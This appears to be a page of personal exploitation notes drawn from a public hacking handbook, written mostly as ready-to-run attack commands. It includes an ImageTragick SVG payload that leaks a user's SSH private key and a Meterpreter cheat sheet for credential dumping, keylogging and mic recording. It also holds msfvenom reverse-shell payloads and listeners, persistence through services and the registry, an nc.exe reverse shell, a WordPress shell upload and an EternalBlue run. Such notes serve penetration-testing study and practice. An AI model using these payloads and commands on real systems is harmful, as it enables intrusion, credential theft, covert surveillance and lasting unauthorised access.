Exploitation notes

Refernce : https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md

Exploitation Tools

Resources

Resources

Name

Description

URL

Evil-WinRM

The ultimate WinRM shell for hacking/pentesting

https://github.com/Hackplayers/evil-winrm

Exploitalert

Listing of latest Exploits

https://exploitalert.com

Metasploit

Metasploit Framework

https://github.com/rapid7/metasploit-framework

TheFatRat

TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android.

https://github.com/Screetsec/TheFatRat

ImageTragick

https://imagetragick.com/

MSL / Polyglot Attack

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

poc.svg

<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Executing Payload

$ convert poc.svg poc.png
$ cp /tmp/poc.svg /var/www/html/convert_images/

Metasploit

https://github.com/rapid7/metasploit-framework

https://github.com/rapid7/metasploit-payloads

General Usage

$ sudo msfdb run                   // start database
$ sudo msfdb init                  // database initialization
$ msfdb --use-defaults delete      // delete existing databases
$ msfdb --use-defaults init        // database initialization
$ msfdb status                     // database status
msf6 > workspace                   // metasploit workspaces
msf6 > workspace -a <WORKSPACE>    // add a workspace
msf6 > workspace -r <WORKSPACE>    // rename a workspace
msf6 > workspace -d <WORKSPACE>    // delete a workspace
msf6 > workspace -D                // delete all workspaces
msf6 > db_nmap <OPTIONS>           // execute nmap and add output to database
msf6 > hosts                       // reads hosts from database
msf6 > services                    // reads services from database
msf6 > vulns                       // displaying vulnerabilities
msf6 > search                      // search within metasploit
msf6 > set RHOST <RHOST>           // set remote host
msf6 > set RPORT <RPORT>           // set remote port
msf6 > run                         // run exploit
msf6 > spool /PATH/TO/FILE         // recording screen output
msf6 > save                        // saves current state
msf6 > exploit                     // using module exploit
msf6 > payload                     // using module payload
msf6 > auxiliary                   // using module auxiliary
msf6 > encoder                     // using module encoder
msf6 > nop                         // using module nop
msf6 > show sessions               // displays all current sessions
msf6 > sessions -i 1               // switch to session 1
msf6 > sessions -u <ID>            // upgrading shell to meterpreter
msf6 > sessions -k <ID>            // kill specific session
msf6 > sessions -K                 // kill all sessions
msf6 > jobs                        // showing all current jobs
msf6 > show payloads               // displaying available payloads
msf6 > set VERBOSE true            // enable verbose output
msf6 > set forceexploit true       // exploits the target anyways
msf6 > set EXITFUNC thread         // reverse shell can exit without exit the program
msf6 > set AutoLoadStdapi false    // disables autoload of stdapi
msf6 > set PrependMigrate true     // enables automatic process migration
msf6 > set PrependMigrateProc explorer.exe                        // auto migrate to explorer.exe
msf6 > use post/PATH/TO/MODULE                                    // use post exploitation module
msf6 > use post/linux/gather/hashdump                             // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter                 // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // use a specific module
C:\> > Ctrl + z                                  // put active meterpreter shell in background
meterpreter > loadstdapi                         // load stdapi
meterpreter > background                         // put meterpreter in background (same as "bg")
meterpreter > shell                              // get a system shell
meterpreter > channel -i <ID>                    // get back to existing meterpreter shell
meterpreter > ps                                 // checking processes
meterpreter > migrate 2236                       // migrate to a process
meterpreter > getuid                             // get the user id
meterpreter > sysinfo                            // get system information
meterpreter > search -f <FILE>                   // search for a file
meterpreter > upload                             // uploading local files to the target
meterpreter > ipconfig                           // get network configuration
meterpreter > load powershell                    // loads powershell
meterpreter > powershell_shell                   // follow-up command for load powershell
meterpreter > powershell_execute                 // execute command
meterpreter > powershell_import                  // import module
meterpreter > powershell_shell                   // shell
meterpreter > powershell_session_remove          // remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'                                // network discovery
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'    // network scan
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'                            // port scan
meterpreter > load kiwi                          // load mimikatz
meterpreter > help kiwi                          // mimikatz help
meterpreter > kiwi_cmd                           // execute mimikatz native command
meterpreter > lsa_dump_sam                       // lsa sam dump
meterpreter > dcsync_ntlm krbtgt                 // dc sync
meterpreter > creds_all                          // dump all credentials
meterpreter > creds_msv                          // msv dump
meterpreter > creds_kerberos                     // kerberos dump
meterpreter > creds_ssp                          // ssp dump
meterpreter > creds_wdigest                      // wdigest dump
meterpreter > getprivs                           // get privileges after loading mimikatz
meterpreter > getsystem                          // gain system privileges if user is member of administrator group
meterpreter > hashdump                           // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm    // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester    // checking for exploits
meterpreter > run post/windows/manage/enable_rdp              // enables rdp
meterpreter > run post/multi/manage/autoroute                 // runs autoroutes
meterpreter > run auxiliary/server/socks4a                    // runs socks4 proxy server
meterpreter > keyscan_start                                   // enabled keylogger
meterpreter > keyscan_dump                                    // showing the output
meterpreter > screenshare                                     // realtime screen sharing
meterpreter > screenshare -q 100                              // realtime screen sharing
meterpreter > record_mic                                      // recording mic output
meterpreter > timestomp                                       // modify timestamps
meterpreter > execute -f calc.exe                             // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding

Metasploit through Proxychains

$ proxychains -q msfconsole

Meterpreter Listener

Generate Payload

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe

Setup Listener for Microsoft Windows

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run

Setup Listener for MacOS

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

Download Files

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run

C:\> .\<FILE>.exe

meterpreter > download *

Enumeration

SNMP Scan

msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_login) > run

SNMP Enum

msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_enum) > run

Tomcat Enumeration

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

Exploit Suggester

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run

Execute Binaries

Port Forwarding with Chisel

meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks"

Pivoting

Port Forwarding with Meterpreter

meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>
meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>

SOCKS Proxy on Meterpreter Sessions

meterpreter > use auxiliary/server/socks_proxy

Pivoting with Meterpreter

meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24
background
msf > use auxiliary/scanner/portscan/tcp

Auxiliary Handling

Auxiliary Setup

msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run

Auxiliary Output Directory

/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt

Persistence

Setting up Persistent Access

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe

Copy exploit to target machine

msf6 > use exploit/windows/local/persistence
msf6 > set session 1
msf6 > use windows/meterpreter/reverse_tcp

Persistence through persistence_service

msf6 > use exploit/windows/local/persistence_service
msf6 > set session 2
msf6 > set lport 5678
msf6 > exploit

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 5678
msf6 > exploit

Persistence through Persistence_exe

msf6 > use post/windows/manage/persistence_exe
msf6 > set session 1
msf6 > set rexepath /root/payload.exe
msf6 > exploit

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 1234
msf6 > exploit

Persistence through Registry

msf6 > use exploit/windows/local/registry_persistence 
msf6 > set session 1
msf6 > set lport 7654
msf6 > exploit

msf6 > use exploit/multi/handler
msf6 > set set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 7654
msf6 > exploit

Exploit Handling

WP Shell Upload

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT>
msf6 > run

meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>"

Dedicated Exploit

msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST>
msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit

Additional Options

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1

searchsploit

$ searchsploit <NAME>
$ searchsploit --cve <CVE>
$ searchsploit -m <ID>
$ searchsploit -x <ID> / <PATH>

PreviousMedium and other articles links NextPost Exploitation

Last updated 2 years ago

Was this helpful?

Exploitation Tools

Table of Contents

Resources

ImageTragick

MSL / Polyglot Attack

poc.svg

Executing Payload

Metasploit

General Usage

Metasploit through Proxychains

Meterpreter Listener

Enumeration

Execute Binaries

Pivoting

Auxiliary Handling

Persistence

Exploit Handling

searchsploit